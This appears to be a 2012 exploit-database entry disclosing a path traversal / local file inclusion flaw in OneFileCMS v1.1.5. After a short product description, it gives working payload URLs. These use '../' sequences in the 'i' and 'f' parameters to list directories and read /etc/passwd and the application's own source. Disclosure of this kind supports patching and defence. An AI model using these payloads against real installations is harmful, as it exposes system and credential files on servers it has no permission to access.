# Exploit Title: OneFileCMS v.1.1.5 Local File Inclusion Vulnerability# Google Dork: --# Date: 16/03/2012# Author: mr.pr0n (@_pr0n_)# Homepage: http://ghostinthelab.wordpress.com/ - http://s3cure.gr# Software Link: https://github.com/rocktronica/OneFileCMS# Version: OneFileCMS v.1.1.5# Tested on: Linux Fedora 14===============
Description
===============
OneFileCMS is just that. It's a flat, light, one file CMS (Content
Management System) entirely contained in an easy-to-implement, highly
customizable, database-less PHP script. Coupling a utilitarian code editor
withall the basic necessities of an FTP application, OneFileCMS can
maintain a whole website completely in-browser without any external
programs.=======================================================[!] All vulnerabilities requires authentication.[!]=======================================================
Directory Listing, using the "i" parameter:
http://TARGET/onefilecms/onefilecms.php?i=../../../../
Read local files, using the "f" parameter:
http://TARGET/onefilecms/onefilecms.php?f=../../../../etc/passwd
http://TARGET/onefilecms/onefilecms.php?f=../../../../var/www/html/onefilecms/onefilecms.php
--
http://ghostinthelab.wordpress.com
